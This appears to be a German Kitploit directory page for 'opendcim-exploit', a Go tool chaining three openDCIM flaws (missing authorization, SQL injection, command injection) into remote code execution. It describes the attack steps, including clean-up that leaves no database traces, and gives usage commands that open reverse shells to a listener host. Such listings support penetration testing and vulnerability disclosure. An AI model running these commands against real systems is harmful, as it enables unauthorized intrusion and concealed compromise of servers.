Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
opendcim-exploit — openDCIM install.php SQLi-zu-RCE-Kette (CWE-862 + CWE-89 + CWE-78) | Kitploit
Tools/GitHubGitHub/chocapikk/opendcim-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubchocapikk/opendcim-exploit

opendcim-exploit

openDCIM install.php SQLi-zu-RCE-Kette (CWE-862 + CWE-89 + CWE-78)

Repository anzeigen
52vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

openDCIM - SQLi zu RCE durch Konfigurationsvergiftung

Kette zur Remote-Codeausführung, die auf das LDAP-Konfigurationsformular von openDCIMs install.php abzielt. Basierend auf dem VulnCheck go-exploit Framework.

Angriffskette

#CVECWEBeschreibung
1CVE-2026-28515CWE-862install.php führt vor dem LDAP-Konfigurationsformular keine Rollenprüfung durch – jeder Benutzer kann darauf zugreifen
2CVE-2026-28516CWE-89Config::UpdateParameter() verwendet String-Interpolation und gestapelte Abfragen über PDO+MySQL
3CVE-2026-28517CWE-78report_network_map.php übergibt den Konfigurationswert dot direkt an exec()

Betroffen: Alle Versionen (getestet auf dem neuesten Commit 4467e9c4)

Funktionsweise

  1. POST an install.php – SQL-Injection über LDAP-Formular sichert Konfiguration, überschreibt dot mit einem Command-Payload
  2. GET report_network_map.php – löst exec() aus, bestätigt RCE über id-Ausgabe
  3. POST an install.php – überschreibt dot mit einem Reverse-Shell-Payload
  4. GET report_network_map.php – löst Reverse Shell aus
  5. POST an install.php – stellt alle ursprünglichen Konfigurationswerte aus der Backup-Tabelle wieder her

Nach der Ausnutzung bleiben keine Spuren in der Datenbank zurück.

Build

root@kitploit:~
go build -o opendcim-exploit .

Verwendung

Docker-Bereitstellungen (unauthentifiziert)

root@kitploit:~
# Nur Scan
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit mit Reverse Shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

htpasswd-Bereitstellungen (jeder gültige Benutzer)

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

Flags

Tool herunterladen
FlagStandardBeschreibung
-rhostZiel-Host
-rport80Ziel-Port
-sslfalseHTTPS verwenden
-lhostListener-Host (für Reverse Shell)
-lportListener-Port (für Reverse Shell)
-c2C2-Typ: SimpleShellServer oder SSLShellServer
-usernameHTTP-Basic-Auth-Benutzername (bei SetEnv-Bereitstellungen weglassen)
-passwordHTTP-Basic-Auth-Passwort (bei SetEnv-Bereitstellungen weglassen)
-aAsset-Erkennung (prüfen, ob Ziel ausnutzbar ist)
-eExploit-Modus